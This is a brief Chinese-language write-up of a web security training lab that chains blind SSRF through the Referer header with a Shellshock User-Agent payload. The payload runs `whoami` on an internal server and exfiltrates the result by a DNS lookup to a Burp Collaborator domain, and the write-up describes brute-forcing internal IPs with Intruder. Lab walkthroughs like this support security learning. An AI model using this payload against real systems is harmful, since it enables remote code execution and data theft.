# SSRF Lab6
本題 Blind SSRF + Shellshock RCE + OAST外洩 的三合一組合技。
概要:
- 要想辦法透過 Referer header 觸發 SSRF,然後對內部的 `192.168.0.X:8080 server` 發送帶有 Shellshock Payload 的請求。
- 再利用內部 server 回送出 DNS 請求,讓 OS 使用者名稱 (whoami) 被送到 Burp Collaborator,以達到外洩資料的目的。
一樣進入網站攔截請求。


先複製我們的子網域。
```
cwc4774215wks4a7ztwghf4im9s0g44t.oastify.com
```
然後製作一個 User-Agent:
```
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).cwc4774215wks4a7ztwghf4im9s0g44t.oastify.com
```
- `() { :; };`:Shellshock 攻擊觸發句法
- `/usr/bin/nslookup $(whoami).xxx.oastify.com`:$(whoami):會在伺服器上執行 whoami,得到 OS 使用者名稱(如 ubuntu 或 apache)
- 然後拼成:`ubuntu.cwc47742....oastify.com`
- 執行 nslookup,伺服器會做一個 DNS 查詢,我們的 Collaborator 子網域請求。
- 最後在 Collaborator 收到一筆請求,完整域名中就包含了對方的 OS 使用者帳號名。
Referer 為 `http://192.168.0.1:8080`,並用 Intruder 爆破 IP,如果 IP 對了,我們就會收到訊息。


```
peter-1Vfr2B
```

---